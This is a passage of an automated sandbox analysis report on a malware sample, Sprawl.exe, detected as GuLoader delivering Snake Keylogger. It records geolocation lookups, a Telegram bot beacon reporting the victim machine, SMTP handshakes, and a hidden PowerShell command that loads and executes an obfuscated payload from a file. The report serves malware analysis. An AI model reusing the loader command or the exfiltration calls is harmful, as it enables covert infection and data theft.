                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.650016188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:14 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:15 UTC892INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:15 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31691
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyVk8iIQK%2FrmoOsIv7SZhmI60dfLcneURxNl96jJ2QlzdwJKw9pUR1un7XwJ%2BdvtBs4UHJal9TWZLBTlEZwIZNiGyteZdoCHPijS8sd089wQWqxrqD4q5rwfrTWfSPpui6cYdBLS"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14c9cabee9a4-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2333601&cwnd=251&unsent_bytes=0&cid=d0f90790ee196b7e&ts=183&x=0"
                                                                                                                          2024-10-22 14:12:15 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.650017188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:15 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:15 UTC902INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:15 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31691
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2FB6DQ1jGAR67Tj6tO8K7k9SPs1HIbBec5H1d%2FgrlMsaAqQ%2Bw0mcFewK7baBBzROq7PSReY3Nj3H3aH%2F%2FfQtafuV82UDLJVqLMQdBvZH4qtOSptg9rLSqZp7joI%2FC2%2BohGUpzHPw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14ce0b5c0bc4-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1876&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1778869&cwnd=245&unsent_bytes=0&cid=c75cf867ac92b266&ts=155&x=0"
                                                                                                                          2024-10-22 14:12:15 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.650020188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:16 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:16 UTC889INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:16 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31692
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D08n6FTGUGoX1fwpKPZZ3ZEbwoVFmUSowimSYEdaNBIYXpNstxcA7cNu5UW79XvFRWxe9Ap0cjbEt04RsFlamwbiSEub6mpUvzMZXBCu7SZY8V47T8JLTGtx4zog1rmPjF56R%2F77"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14d469dce98f-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2360228&cwnd=40&unsent_bytes=0&cid=955fe602a91f23b4&ts=183&x=0"
                                                                                                                          2024-10-22 14:12:16 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.650021188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:17 UTC63OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-10-22 14:12:17 UTC896INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:17 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31693
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2F8iJxIrAqEVGfXhIQWxvN4AN7bi56d36Foimlfpv55%2BBZN85tonoV2hitoNHsUftnKFcpMTcZK%2FomESicRPUyLkHoKYHjOrCLhmct%2FPU4Jn3SWnX4qXIADMKBxGLTDJTFDtmHFP"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14d84a26e9b5-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1691588&cwnd=251&unsent_bytes=0&cid=9eae4b8647486528&ts=166&x=0"
                                                                                                                          2024-10-22 14:12:17 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.650024188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:18 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:18 UTC894INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:18 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31694
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LrsUwXuwzFmrcGqSTiH3DJl5kQpdu9%2BwmRHUOQpANt0kduIUFrVeU8QPitspJNZNDMNqxOkupjEza1YrXttAh14QWNBNK0jOIE5b0jVNxtFBePA%2FYk%2FZJ1OCxhWAw2wxeWWInCEj"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14de7caf3476-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2371826&cwnd=251&unsent_bytes=0&cid=42c10a61516b9f49&ts=152&x=0"
                                                                                                                          2024-10-22 14:12:18 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.650023149.154.167.2204434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:18 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:18 UTC344INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:18 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          2024-10-22 14:12:18 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.650025149.154.167.2204433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:19 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:19 UTC344INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:19 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          2024-10-22 14:12:19 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                          Oct 22, 2024 16:12:28.396909952 CEST58750027213.165.67.102192.168.2.6220 kundenserver.de (mreue012) Nemesis ESMTP Service ready
                                                                                                                          Oct 22, 2024 16:12:28.397146940 CEST50027587192.168.2.6213.165.67.102EHLO 760639
                                                                                                                          Oct 22, 2024 16:12:28.397206068 CEST58750028213.165.67.102192.168.2.6220 kundenserver.de (mreue011) Nemesis ESMTP Service ready
                                                                                                                          Oct 22, 2024 16:12:28.397525072 CEST50028587192.168.2.6213.165.67.102EHLO 760639
                                                                                                                          Oct 22, 2024 16:12:28.674257040 CEST58750027213.165.67.102192.168.2.6250-kundenserver.de Hello 760639 [173.254.250.76]
                                                                                                                          250-8BITMIME
                                                                                                                          250-SIZE 141557760
                                                                                                                          250 STARTTLS
                                                                                                                          Oct 22, 2024 16:12:28.677109003 CEST58750028213.165.67.102192.168.2.6250-kundenserver.de Hello 760639 [173.254.250.76]
                                                                                                                          250-8BITMIME
                                                                                                                          250-SIZE 141557760
                                                                                                                          250 STARTTLS
                                                                                                                          Oct 22, 2024 16:12:28.752207994 CEST50027587192.168.2.6213.165.67.102STARTTLS
                                                                                                                          Oct 22, 2024 16:12:28.752315998 CEST50028587192.168.2.6213.165.67.102STARTTLS
                                                                                                                          Oct 22, 2024 16:12:28.997915030 CEST58750027213.165.67.102192.168.2.6220 OK
                                                                                                                          Oct 22, 2024 16:12:28.999497890 CEST58750028213.165.67.102192.168.2.6220 OK

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:10:10:30
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\Sprawl.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Sprawl.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:880'264 bytes
                                                                                                                          MD5 hash:47FD98348B7D314E4E9DAE46E5F1E1A1
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:10:10:32
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
                                                                                                                          Imagebase:0xcb0000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:10:10:33
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:10:10:37
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
                                                                                                                          Imagebase:0xcb0000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2855794933.000000000B95D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:10:10:37
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:10:11:31
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                          Imagebase:0x640000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3358316175.0000000005B30000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:9
                                                                                                                          Start time:10:11:31
                                                                                                                          Start date:22/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                          Imagebase:0x640000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.3358056875.0000000006390000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:26.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:23.3%
                                                                                                                            Total number of Nodes:1256
                                                                                                                            Total number of Limit Nodes:42
